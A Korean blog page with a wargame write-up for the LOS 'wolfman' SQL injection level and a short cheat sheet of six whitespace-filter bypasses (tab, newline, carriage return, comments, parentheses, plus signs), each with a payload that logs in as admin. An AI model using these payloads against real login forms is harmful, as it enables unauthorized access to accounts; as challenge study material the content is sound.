공백 필터링2 [LOS] 5번 wolfman ㅎㅇ id가 admin이면 문제가 풀리고 공백이 필터링 되어있는 문제인것같다. 원래대로라면 ?pw=a' or id='admin 이렇게 입력하면 되는 문제이지만 공백이 필터링 되었기에 /**/를 사용해서?pw=a'/**/or/**/id='admin 이렇게 입력하면 Clear! 2017. 8. 3. [WEB] SQL injection 공백 우회 공백(WHITE SPACE) 우회 1. Tab : %09 - no=1%09or%09id='admin' 2. Line Feed (\n): %0a - no=1%0aor%0aid='admin' 3. Carrage Return(\r) : %0d - no=1%0dor%0did='admin' 4. 주석 : /**/ - no=1/**/or/**/id='admin' 5. 괄호 : () - no=(1)or(id='admin') 6. 더하기 : + - no=1+or+id='admin' 2017. 8. 3. 이전 1 다음 반응형